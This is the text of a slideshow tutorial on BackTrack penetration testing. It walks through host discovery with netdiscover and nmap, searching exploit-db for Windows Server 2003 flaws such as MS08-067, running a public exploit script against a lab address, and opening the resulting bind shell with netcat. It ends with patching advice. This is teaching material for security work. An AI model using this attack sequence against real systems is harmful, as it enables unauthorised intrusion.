1. Hands on with BackTrack Information gathering, scanning, simple exploits By Edison Carrick

2. Starting up and Getting an IP startx ifup eth0

3. The Tools The ‘K Menu’ That’s not all: – The `/pentest` directory

4. netdiscover ‘an active/passive address reconnaissance tool’ Using ARP, it detects live hosts on a network.

5. nmap Nmap ("Network Mapper") is a free and open source commandline utility for network exploration or security auditing. Extremely powerful. Simple use: Nmap –v –A ‘v’ for verbosity and ‘A’ for OS/version Detection

6. Zenmap Nmap, but prettier Zenmap is a GUI interface for nmap. Easily detect OS, Services, TCP sequences and more with a click or two of a button.

7. Exploits Databases and Programs – ExploitDB – Metasploit The internet – Exploit-db.com – Google

8. Searching for a vulnerability exploitDB –./searchsploit Googling Conveniently Remote Exploit has included their exploitDB on backtrack. Since we have a 2003 server lets search for 2003 vulnerabilities. –./searchsploit 2003 –./searchsploit 2k3

9. Exploring and Testing a written Exploit ‘cat’ perfect for viewing Recognizing shellcode, and how the exploit runs. Running the exploit –./7132.py – Finding the usage

10. Getting the Shell./7132.py 192.168.1.2 2 Noticing that the exploit prints that the shell is bound to the server on port 4444. Netcat- the tool for everything – nc –v 192.168.1.2 4444

11. Prevention? Keep servers and computers up-to- date and patched. Use only services that are necessary, and disable the ones unneeded. Using the default settings can be dangerous.

12. More Information NetDiscover- http://nixgeneration.com/~jaime/netdi scover/ http://nixgeneration.com/~jaime/netdi scover/ Nmap/Zenmap- http://nmap.org/http://nmap.org/ http://www.exploit-db.com/ http://www.metasploit.com/ More on the MS08-067 vulnerability- MS08-067 MS08-067 Background image for PowerPoint found at- xshock.dexshock.de